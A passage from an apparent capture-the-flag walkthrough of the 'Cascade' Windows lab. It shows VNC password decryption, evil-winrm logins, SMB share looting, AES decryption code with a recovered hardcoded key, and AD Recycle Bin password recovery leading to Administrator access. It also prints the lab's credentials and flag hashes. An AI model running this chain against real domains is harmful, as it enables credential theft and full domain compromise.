"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
In this configuration, there is the following line includes an encrypted password.
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
By googling, we can find this post for cracking VNC password.
Metasploit has a module for this purpose.
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
irb: warn: can't alias jobs from irb_jobs.
>> pass="\x17\x52\x6b\x06\x23\x4e\x58\x07"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), pass
=> "sT333ve2"
Then, try to log in as s.smith using the password sT333ve2.
We can achieve an user shell.
root@kali:~/evil-winrm# ./evil-winrm.rb -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>
user.txt is in the directory C:\Users\s.smith\Documents.
*Evil-WinRM* PS C:\Users\s.smith\Documents> cat C:\Users\s.smith\Desktop\user.txt
dfa503e9bc06ef4d8ef096943283c014
3. Getting Root
Take a look at the current user.
s.smith is in Audit Share, IT and Remote Management Use groups.
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name s.smith
Full Name Steve Smith
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/28/2020 8:58:05 PM
Password expires Never
Password changeable 1/28/2020 8:58:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script MapAuditDrive.vbs
User profile
Home directory
Last logon 7/28/2020 3:21:54 AM
Logon hours allowed All
Local Group Memberships *Audit Share *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
For the PowerShell, we can use the following command to show the user information.
*Evil-WinRM* PS C:\Users\s.smith\Documents> Get-ADUser -identity s.smith -properties *
AccountExpirationDate :
accountExpires : 9223372036854775807
AccountLockoutTime :
AccountNotDelegated : False
AllowReversiblePasswordEncryption : False
BadLogonCount : 0
badPasswordTime : 132403764963483208
badPwdCount : 0
CannotChangePassword : True
CanonicalName : cascade.local/UK/Users/Steve Smith
Certificates : {}
City :
CN : Steve Smith
codePage : 0
Company :
Country :
countryCode : 0
Created : 1/9/2020 6:08:13 PM
createTimeStamp : 1/9/2020 6:08:13 PM
Deleted :
Department :
Description :
DisplayName : Steve Smith
DistinguishedName : CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
Division :
DoesNotRequirePreAuth : False
dSCorePropagationData : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/13/2020 4:36:28 PM, 1/9/2020 6:08:13 PM...}
EmailAddress :
EmployeeID :
EmployeeNumber :
Enabled : True
Fax :
GivenName : Steve
HomeDirectory :
HomedirRequired : False
HomeDrive :
HomePage :
HomePhone :
Initials :
instanceType : 4
isDeleted :
LastBadPasswordAttempt : 7/28/2020 3:21:36 AM
LastKnownParent :
lastLogoff : 0
lastLogon : 132403765148187532
LastLogonDate : 7/28/2020 3:21:54 AM
lastLogonTimestamp : 132403765148187532
LockedOut : False
logonCount : 16
LogonWorkstations :
Manager :
MemberOf : {CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local, CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local, CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local}
MNSLogonAccount : False
MobilePhone :
Modified : 7/28/2020 3:21:54 AM
modifyTimeStamp : 7/28/2020 3:21:54 AM
msDS-User-Account-Control-Computed : 0
Name : Steve Smith
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
ObjectClass : user
ObjectGUID : 38ebd9df-c4f7-4d00-9a9f-f503432ffa7d
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1107
Office :
OfficePhone :
Organization :
OtherName :
PasswordExpired : False
PasswordLastSet : 1/28/2020 7:58:05 PM
PasswordNeverExpires : True
PasswordNotRequired : False
POBox :
PostalCode :
PrimaryGroup : CN=Domain Users,CN=Users,DC=cascade,DC=local
primaryGroupID : 513
ProfilePath :
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132247150854857364
SamAccountName : s.smith
sAMAccountType : 805306368
ScriptPath : MapAuditDrive.vbs
sDRightsEffective : 0
ServicePrincipalNames : {}
SID : S-1-5-21-3332504370-1206983947-1165150453-1107
SIDHistory : {}
SmartcardLogonRequired : False
sn : Smith
State :
StreetAddress :
Surname : Smith
Title :
TrustedForDelegation : False
TrustedToAuthForDelegation : False
UseDESKeyOnly : False
userAccountControl : 66048
userCertificate : {}
UserPrincipalName : s.smith@cascade.local
uSNChanged : 323714
uSNCreated : 16404
whenChanged : 7/28/2020 3:21:54 AM
whenCreated : 1/9/2020 6:08:13 PM
Since we got a new user, try to enumerate the SMB shares again.
We can find that now we have read access to Audit$ previously we didn’t have any access.
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
Alternatively, we can use smbclient as well(But it doesn’t show the access permission).
root@kali:~# smbclient -L 10.10.10.182 -U s.smith
Enter WORKGROUP\s.smith's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Then, take a look at the newly obtained share Audit$.
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
Audit$ READ ONLY
.\Audit$\*
dr--r--r-- 0 Thu Jan 30 03:01:26 2020 .
dr--r--r-- 0 Thu Jan 30 03:01:26 2020 ..
fr--r--r-- 13312 Wed Jan 29 06:47:08 2020 CascAudit.exe
fr--r--r-- 12288 Thu Jan 30 03:01:26 2020 CascCrypto.dll
dr--r--r-- 0 Wed Jan 29 06:43:18 2020 DB
fr--r--r-- 45 Wed Jan 29 08:29:47 2020 RunAudit.bat
fr--r--r-- 363520 Wed Jan 29 05:42:18 2020 System.Data.SQLite.dll
fr--r--r-- 186880 Wed Jan 29 05:42:18 2020 System.Data.SQLite.EF6.dll
dr--r--r-- 0 Wed Jan 29 05:42:18 2020 x64
dr--r--r-- 0 Wed Jan 29 05:42:18 2020 x86
.\Audit$\DB\*
dr--r--r-- 0 Wed Jan 29 06:43:18 2020 .
dr--r--r-- 0 Wed Jan 29 06:43:18 2020 ..
fr--r--r-- 24576 Wed Jan 29 06:43:18 2020 Audit.db
.\Audit$\x64\*
dr--r--r-- 0 Wed Jan 29 05:42:18 2020 .
dr--r--r-- 0 Wed Jan 29 05:42:18 2020 ..
fr--r--r-- 1639936 Wed Jan 29 05:42:18 2020 SQLite.Interop.dll
.\Audit$\x86\*
dr--r--r-- 0 Wed Jan 29 05:42:18 2020 .
dr--r--r-- 0 Wed Jan 29 05:42:18 2020 ..
fr--r--r-- 1246720 Wed Jan 29 05:42:18 2020 SQLite.Interop.dll
To download files with specific extensions, we can use smbmap with -A option.
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .db
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
[+] Starting search for files matching '.db' on share Audit$.
[+] Match found! Downloading: Audit$\DB\Audit.db
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .exe
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
[+] Starting search for files matching '.exe' on share Audit$.
[+] Match found! Downloading: Audit$\CascAudit.exe
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .bat
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
[+] Starting search for files matching '.bat' on share Audit$.
[+] Match found! Downloading: Audit$\RunAudit.bat
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .dll
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
[+] Starting search for files matching '.dll' on share Audit$.
[+] Match found! Downloading: Audit$\CascCrypto.dll
[+] Match found! Downloading: Audit$\System.Data.SQLite.dll
[+] Match found! Downloading: Audit$\System.Data.SQLite.EF6.dll
[+] Match found! Downloading: Audit$\x64\SQLite.Interop.dll
[+] Match found! Downloading: Audit$\x86\SQLite.Interop.dll
Using file command, we can figure out that Audit.db is SQLite 3.x database file.
root@kali:~# file 10.10.10.182-Audit_DB_Audit.db
10.10.10.182-Audit_DB_Audit.db: SQLite 3.x database, last written using SQLite version 3027002
To take a look at the Audit.db, run sqlite3 command.
There is a base64 “password” for user ArkSvc.
root@kali:~# sqlite3 10.10.10.182-Audit_DB_Audit.db
SQLite version 3.32.3 2020-06-18 14:00:33
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from LDAP;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> .schema LDAP
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
However, this password is encrypted.
root@kali:~# echo BQO5l5Kj9MdErXx6Q6AGOw== | base64 -d
������D�|zC�;
Next, take a look at RunAudit.bat.
IT runs CascAudit.exe with the argument \\CASC-DC1\Audit$\DB\Audit.db.
root@kali:~# cat 10.10.10.182-Audit_RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
Since we do not have the source code for CascAudit.exe, decompile it with dnSpy.
First, spin up Windows VM, launch dnSpy and open the CascAudit.exe.
Then, go this way to find the Main() function of CascAudit.exe.
CascAudit(1.0.0.0)CascAudit.exe{} CascAudiotMainModule
Source Code:
namespace CascAudiot
{
// Token: 0x02000008 RID: 8
[StandardModule]
internal sealed class MainModule
{
// Token: 0x0600000F RID: 15 RVA: 0x00002128 File Offset: 0x00000328
[STAThread]
public static void Main()
{
if (MyProject.Application.CommandLineArgs.Count != 1)
{
Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
return;
}
checked
{
using (SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
{
string str = string.Empty;
string password = string.Empty;
string str2 = string.Empty;
try
{
sqliteConnection.Open();
using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
{
using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
{
sqliteDataReader.Read();
str = Conversions.ToString(sqliteDataReader["Uname"]);
str2 = Conversions.ToString(sqliteDataReader["Domain"]);
string text = Conversions.ToString(sqliteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(text, "c4scadek3y654321");
}
catch (Exception ex)
{
Console.WriteLine("Error decrypting password: " + ex.Message);
return;
}
}
}
sqliteConnection.Close();
}
catch (Exception ex2)
{
Console.WriteLine("Error getting LDAP connection data From database: " + ex2.Message);
return;
}
int num = 0;
using (DirectoryEntry directoryEntry = new DirectoryEntry())
{
directoryEntry.Username = str2 + "\\" + str;
directoryEntry.Password = password;
directoryEntry.AuthenticationType = AuthenticationTypes.Secure;
using (DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry))
{
directorySearcher.Tombstone = true;
directorySearcher.PageSize = 1000;
directorySearcher.Filter = "(&(isDeleted=TRUE)(objectclass=user))";
directorySearcher.PropertiesToLoad.AddRange(new string[]
{
"cn",
"sAMAccountName",
"distinguishedName"
});
using (SearchResultCollection searchResultCollection = directorySearcher.FindAll())
{
Console.WriteLine("Found " + Conversions.ToString(searchResultCollection.Count) + " results from LDAP query");
sqliteConnection.Open();
try
{
try
{
foreach (object obj in searchResultCollection)
{
SearchResult searchResult = (SearchResult)obj;
string text2 = string.Empty;
string text3 = string.Empty;
string text4 = string.Empty;
if (searchResult.Properties.Contains("cn"))
{
text2 = Conversions.ToString(searchResult.Properties["cn"][0]);
}
if (searchResult.Properties.Contains("sAMAccountName"))
{
text3 = Conversions.ToString(searchResult.Properties["sAMAccountName"][0]);
}
if (searchResult.Properties.Contains("distinguishedName"))
{
text4 = Conversions.ToString(searchResult.Properties["distinguishedName"][0]);
}
using (SQLiteCommand sqliteCommand2 = new SQLiteCommand("INSERT INTO DeletedUserAudit (Name,Username,DistinguishedName) VALUES (@Name,@Username,@Dn)", sqliteConnection))
{
sqliteCommand2.Parameters.AddWithValue("@Name", text2);
sqliteCommand2.Parameters.AddWithValue("@Username", text3);
sqliteCommand2.Parameters.AddWithValue("@Dn", text4);
num += sqliteCommand2.ExecuteNonQuery();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
{
(enumerator as IDisposable).Dispose();
}
}
}
finally
{
sqliteConnection.Close();
Console.WriteLine("Successfully inserted " + Conversions.ToString(num) + " row(s) into database");
}
}
}
}
}
}
}
// Token: 0x04000008 RID: 8
private const int USER_DISABLED = 2;
}
}
Following is the important section.
It is getting the encrypted password from SQLite database and decrypting with the key c4scadek3y654321.
sqliteConnection.Open();
using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
{
using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
{
sqliteDataReader.Read();
str = Conversions.ToString(sqliteDataReader["Uname"]);
str2 = Conversions.ToString(sqliteDataReader["Domain"]);
string text = Conversions.ToString(sqliteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(text, "c4scadek3y654321");
}
catch (Exception ex)
{
Console.WriteLine("Error decrypting password: " + ex.Message);
return;
}
}
}
sqliteConnection.Close();
However, CascAudit.exe does not have the definition of Crypto.DecryptString().
Then, take a look at CascCrypto.dll. We can find the function defined.
public static string DecryptString(string EncryptedString, string Key)
{
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = 1;
aes.Key = Encoding.UTF8.GetBytes(Key);
string @string;
using (MemoryStream memoryStream = new MemoryStream(array))
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), 0))
{
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
@string = Encoding.UTF8.GetString(array2);
}
}
return @string;
}
To get the password to log in, we have to write the following .NET code.
Actually, if we google the encrypted password BQO5l5Kj9MdErXx6Q6AGOw==, we can find someone’s left the code here https://dotnetfiddle.net/2RDoWz.
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
public class Program
{
public static void Main()
{
string str = string.Empty;
str = DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321");
Console.WriteLine(str);
}
public static string DecryptString(string EncryptedString, string Key)
{
byte[] buffer = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
((SymmetricAlgorithm) aes).KeySize = 128;
((SymmetricAlgorithm) aes).BlockSize = 128;
((SymmetricAlgorithm) aes).IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
((SymmetricAlgorithm) aes).Mode = CipherMode.CBC;
((SymmetricAlgorithm) aes).Key = Encoding.UTF8.GetBytes(Key);
using (MemoryStream memoryStream = new MemoryStream(buffer))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, ((SymmetricAlgorithm) aes).CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] numArray = new byte[checked (buffer.Length - 1 + 1)];
cryptoStream.Read(numArray, 0, numArray.Length);
return Encoding.UTF8.GetString(numArray);
}
}
}
}
w3lc0meFr31nd is the password we can get by running this .NET code.
Then, try to log in with the credential ArkSvc:w3lc0meFr31nd.
root@kali:~/evil-winrm# ./evil-winrm.rb -u ArkSvc -p 'w3lc0meFr31nd' -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents>
As always, check what group ArkSvc user in.
We notice that this user is in the well-known Windows group AD Recycle Bin.
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 10:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Get-ADobject has an option -includeDeletedObjects to search for the deleted AD objects.
Add -and name -ne "Deleted Objects" to remove “Deleted Objects” container that keeps objects that have isDeleted attribute.
*Evil-WinRM* PS C:\Users\arksvc\Documents> get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Deleted : True
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
Deleted : True
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
Name : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
ObjectClass : group
ObjectGUID : 13375728-5ddb-4137-b8b8-b9041d1d3fd2
Deleted : True
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ObjectClass : groupPolicyContainer
ObjectGUID : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
Deleted : True
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
Name : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
ObjectClass : container
ObjectGUID : 93c23674-e411-400b-bb9f-c0340bda5a34
Deleted : True
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
We found that there is an interesting deleted user account TempAdmin.
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
With the following command, we can view the attributes of a deleted object TempAdmin with GUID f0cc344d-31e0-4866-bceb-a842791ca059.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Identity f0cc344d-31e0-4866-bceb-a842791ca059 -includeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Just like r.thompson, we can find cascadeLegacyPwd for user TempAdmin.
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
By base64 decoding, we can achieve a password baCT3r1aN00dles.
root@kali:~# echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles
Using evil-winrm, we can achieve a shell as Administrator.
root@kali:~/evil-winrm# ./evil-winrm.rb -u administrator -p baCT3r1aN00dles -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
As usual, root.txt is in the directory C:\Users\Administrator\Desktop.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
5ec0a8c63a6e7b1da75c03b4ff7b7c0e
4. References